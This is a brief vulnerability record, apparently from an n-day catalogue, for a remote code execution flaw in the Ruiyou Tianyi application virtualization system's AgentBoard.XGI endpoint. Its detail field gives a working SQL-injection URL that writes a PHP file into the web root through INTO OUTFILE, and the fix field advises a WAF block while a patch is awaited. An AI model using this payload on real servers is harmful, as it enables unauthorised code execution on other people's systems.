vendor = "瑞友"
name = "瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞"
type = "RCE"
version = "未知"
path = "/AgentBoard.XGI"
detail = "http://127.0.0.1/AgentBoard.XGI?user=-1%27%20union%20select%201,%27%3C?php%20phpinfo();?%3E%27%20into%20outfile%20%22..\\\\\\\\..\\\\\\\\WebRoot\\\\\\\\test.XGI%22%20--%20-&cmd=UserLogin"
fix = "WAF封禁路路径，等待发布补丁"
date = "0812"
label = "nday"
